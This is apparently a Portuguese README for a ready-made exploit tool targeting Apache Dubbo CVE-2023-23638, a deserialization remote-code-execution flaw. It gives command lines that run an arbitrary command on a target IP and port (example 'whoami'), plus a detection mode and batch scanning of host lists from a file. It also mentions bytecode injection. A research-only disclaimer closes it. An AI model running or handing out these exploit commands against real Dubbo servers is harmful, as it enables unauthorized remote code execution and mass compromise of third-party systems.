
Prática de engenharia da exploração da vulnerabilidade Apache Dubbo (CVE-2023-23638)
Prática de exploração da vulnerabilidade Apache Dubbo (CVE-2023-23638), cobrindo o processo de descoberta de serviços até exploração e exibição de resultados no Dubbo 3.x. Esta ferramenta é apenas para fins de pesquisa e aprendizado, bem-vindos a todos os especialistas para discutir e fornecer sugestões valiosas.
Esta ferramenta suporta a exploração completa do CVE-2023-23638 no Dubbo 3.x, cobrindo desde a descoberta de serviços até a exploração e exibição de resultados. Também pode ser utilizada na versão Dubbo 2.x, sendo necessário informar manualmente o nome do serviço, nome do método, etc. Escrevi dois artigos de análise sobre esta vulnerabilidade:
Esta ferramenta é apenas para aprendizado, não considerando muitos problemas de aplicações reais, como:
Atualizações futuras continuarão
Este projeto não será mais atualizado. Uma varredura e exploração mais abrangentes do Dubbo serão open source em outro projeto no futuro, fique atento!
Agradeço ao especialista y4tacker por compartilhar a ideia de desserialização nativa do fastjson.
Exploração de URL única
java -jar CVE-2023-23638.jar TARGET_IP TARGET_PORT COMMAND CHARSET(padrão UTF-8)
exemplo:
java -jar CVE-2023-23638.jar 127.0.0.1 20880 whoami
Detecção não destrutiva de URL única
java -jar CVE-2023-23638.jar -s TARGET_IP TARGET_PORT
exemplo:
java -jar CVE-2023-23638.jar -s 127.0.0.1 20880
Detecção em lote
1.txt:
127.0.0.1:20880
192.168.1.1:20880
java -jar CVE-2023-23638.jar -f FILE_PATH
exemplo:
java -jar CVE-2023-23638.jar -f 1.txt
Injeção de bytecode

Execução de comandos

Esta ferramenta é apenas para pesquisa de vulnerabilidades e aprendizado. Se você precisar testar a usabilidade, por favor, configure seu próprio ambiente de laboratório. Ao usar esta ferramenta para detecção, você deve garantir que a ação esteja em conformidade com as leis e regulamentos locais e que obteve autorização suficiente. Não escaneie alvos não autorizados. Caso você realize qualquer ato ilegal durante o uso desta ferramenta, você deverá assumir as consequências correspondentes, e não nos responsabilizaremos por quaisquer responsabilidades legais ou conexas.